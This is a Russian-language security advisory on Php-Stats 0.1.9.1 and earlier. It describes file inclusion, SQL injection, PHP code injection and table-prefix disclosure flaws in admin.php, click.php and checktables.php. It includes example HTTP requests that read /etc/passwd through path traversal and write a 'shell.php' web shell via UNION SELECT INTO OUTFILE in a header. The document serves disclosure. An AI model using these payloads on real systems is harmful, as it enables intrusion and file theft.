Программа: Php-Stats 0.1.9.1 и более ранние версии.

Обнаруженные уязвимости позволяют удаленному пользователю произвести
SQL-инъекцию, получить доступ к важным данным и скомпрометировать уязвимую
систему.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "option[language]" и "option[template]" в сценарии "admin.php".
Удаленный пользователь может подключить произвольные файлы на локальной системе.
Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть
выключена.

Пример:

POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd%00
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[template]=../../../../../../etc/passwd%00

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "option[prefix]" сценария "admin.php" и HTTP заголовке "PC_REMOTE_ADDR"
в сценарии "click.php". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Пример:

GET [path]click.php?id=1&get=1 HTTP/1.1
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM
php_stats_cache/*
Host: [host]
Connection: Close

3. Уязвимость существует из-за недостаточной проверки входных данных в сценарии
"admin.php". Удаленный пользователь может внедрить произвольный PHP код в
сценарий "config.php".

4. Удаленный пользователь может получить данные об используемом префиксе в
названии таблиц, запросив сценарий "checktables.php".

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии